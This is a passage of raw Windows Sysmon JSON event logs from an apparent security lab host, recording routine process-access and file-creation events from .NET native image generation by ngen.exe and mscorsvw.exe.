06:00:57.919","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0519-5F25-0000-001033331300}","TargetProcessId":"2936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8200,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:58.278\r\nProcessGuid: {A837DB8D-0519-5F25-0000-001033331300}\r\nProcessId: 2936\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\b78-0\\System.Runtime.Remoting.dll\r\nCreationUtcTime: 2020-08-01 06:00:58.278","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:58.278","ProcessGuid":"{A837DB8D-0519-5F25-0000-001033331300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\b78-0\\System.Runtime.Remoting.dll","CreationUtcTime":"2020-08-01 06:00:58.278","EventReceivedTime":"2020-08-01 06:00:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8201,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:58.325\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-001034371300}\r\nTargetProcessId: 4668\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:58.325","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-001034371300}","TargetProcessId":"4668","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:00:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8202,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:58.325\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-001034371300}\r\nTargetProcessId: 4668\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:58.325","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-001034371300}","TargetProcessId":"4668","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8203,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:58.325\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-001034371300}\r\nTargetProcessId: 4668\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:58.325","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-001034371300}","TargetProcessId":"4668","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8204,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:58.419\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-0010DD3A1300}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:58.419","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-0010DD3A1300}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:00:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8205,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:58.419\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-0010DD3A1300}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:58.419","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-0010DD3A1300}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8206,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:58.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-0010DD3A1300}\r\nTargetProcessId: 2268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:58.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-051A-5F25-0000-0010DD3A1300}","TargetProcessId":"2268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8207,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:58.544\r\nProcessGuid: {A837DB8D-051A-5F25-0000-0010DD3A1300}\r\nProcessId: 2268\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\8dc-0\\System.ServiceProcess.dll\r\nCreationUtcTime: 2020-08-01 06:00:58.544","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:58.544","ProcessGuid":"{A837DB8D-051A-5F25-0000-0010DD3A1300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\8dc-0\\System.ServiceProcess.dll","CreationUtcTime":"2020-08-01 06:00:58.544","EventReceivedTime":"2020-08-01 06:01:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8208,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:58.575\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-051A-5F25-0000-0010BE3E1300}\r\nTargetProcessId: 3264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsv